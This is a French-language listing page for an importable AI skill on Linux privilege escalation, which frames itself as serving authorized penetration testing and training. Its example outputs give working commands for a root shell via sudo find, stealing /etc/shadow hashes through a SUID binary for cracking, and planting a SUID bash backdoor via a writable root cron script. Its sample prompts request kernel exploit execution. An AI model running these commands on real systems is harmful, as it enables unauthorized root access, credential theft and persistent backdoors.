linux-privilege-escalation
Execute Linux Privilege Escalation Assessments
Security professionals need systematic methods to identify privilege escalation vectors on Linux systems during authorized penetration tests. This skill provides comprehensive enumeration and exploitation workflows covering kernel vulnerabilities, sudo misconfigurations, SUID binaries, and cron job weaknesses.
Télécharger le ZIP du skill
Importer dans Claude
Allez dans ParamĂštres â CapacitĂ©s â Skills â Importer un skill
Activez et commencez Ă utiliser
Tester
Utilisation de "linux-privilege-escalation". User runs sudo -l and finds they can execute /usr/bin/find as root
Résultat attendu:
GTFOBins exploitation: Run 'sudo find . -exec /bin/bash \; -quit' to spawn a root shell. The find command's -exec flag allows arbitrary command execution with root privileges.
Utilisation de "linux-privilege-escalation". SUID base64 binary discovered at /usr/bin/base64
Résultat attendu:
Exploit: Use 'base64 /etc/shadow | base64 -d > shadow.txt' to extract password hashes. Transfer shadow.txt to attacker machine and crack with 'john --wordlist=rockyou.txt shadow.txt' to recover plaintext passwords.
Utilisation de "linux-privilege-escalation". Root cron job executes writable script at /opt/scripts/backup.sh
Résultat attendu:
Hijack: Append 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' to the script. After cron executes, run '/tmp/bash -p' for persistent root access via SUID backdoor.
Audit de sécurité
CritiqueThis skill contains complete weaponized exploitation workflows for Linux privilege escalation. While framed as educational content for penetration testing, it provides ready-to-use commands for gaining unauthorized root access, credential theft via /etc/shadow access, SUID backdoor creation, kernel exploitation, and persistent reverse shell payloads. The static scanner correctly identified 44 high-risk patterns including sudo exploitation, SUID manipulation, and shadow file access. False positives include Ruby backtick detection (actually bash commands in markdown). This content should only be distributed in controlled professional security contexts with explicit authorization requirements.
ProblĂšmes critiques (4)
ProblÚmes à risque élevé (6)
ProblĂšmes Ă risque moyen (3)
ProblĂšmes Ă risque faible (3)
Facteurs de risque
⥠Contient des scripts (1)
âïž Commandes externes (7)
đ AccĂšs rĂ©seau (4)
đ AccĂšs au systĂšme de fichiers (8)
Motifs détectés
Score de qualité
Ce que vous pouvez construire
Authorized Penetration Testing
Security consultants performing internal network assessments use this skill to systematically identify privilege escalation paths and demonstrate business impact of initial access.
Security Audit and Compliance
System administrators audit their own infrastructure to identify and remediate misconfigurations before attackers can exploit them.
Security Training and Education
Security professionals studying for certifications like OSCP, GPEN, or CRT use this skill to understand common Linux privilege escalation techniques in lab environments.
Essayez ces prompts
I have low-privilege shell access to a Linux system. Help me enumerate the system to identify potential privilege escalation vectors including kernel version, sudo permissions, SUID binaries, and running services.
I can run 'sudo -l' and see I have NOPASSWD access to specific binaries. Analyze the output and provide GTFOBins exploitation techniques for each allowed command.
Find all SUID binaries on this system and identify which ones can be exploited for privilege escalation. Provide specific exploitation commands for each vulnerable binary.
The kernel version is [VERSION]. Search for known exploits applicable to this kernel and provide compilation and execution instructions. Include fallback options if the primary exploit fails.
Bonnes pratiques
- Always obtain written authorization before testing and verify scope boundaries
- Test kernel exploits in a lab environment before production use to avoid system crashes
- Document all changes made during assessment for remediation and cleanup
Ăviter
- Running kernel exploits without understanding their mechanism or failure modes
- Creating persistent backdoors beyond the authorized assessment period
- Accessing or exfiltrating data beyond what is required to demonstrate privilege escalation
Foire aux questions
Is this skill legal to use?
Will kernel exploits work on all Linux systems?
What should I do if an exploit crashes the system?
How do I know if a SUID binary is exploitable?
Can this skill be used in cloud environments like AWS or Azure?
What is the difference between this skill and tools like LinPEAS?
Détails du développeur
Auteur
zebbernLicence
MIT
DépÎt
https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/linux-privilege-escalationRéf
main
Structure de fichiers
đ SKILL.md